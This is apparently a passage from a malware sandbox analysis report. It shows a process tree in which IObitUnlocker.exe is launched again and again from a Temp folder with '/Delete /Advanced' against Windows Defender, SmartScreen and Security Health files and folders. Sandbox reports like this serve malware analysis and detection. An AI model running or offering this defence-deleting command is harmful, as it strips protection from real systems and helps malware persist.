                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                            10⤵
                                                                                                                                              PID:5652
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                              10⤵
                                                                                                                                                PID:2840
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                10⤵
                                                                                                                                                  PID:5984
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                  10⤵
                                                                                                                                                    PID:5128
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                    10⤵
                                                                                                                                                      PID:4752
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                      10⤵
                                                                                                                                                        PID:5316
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                        10⤵
                                                                                                                                                          PID:5648
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                          10⤵
                                                                                                                                                            PID:1720
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                            10⤵
                                                                                                                                                              PID:6020
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                              10⤵
                                                                                                                                                                PID:4644
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxyst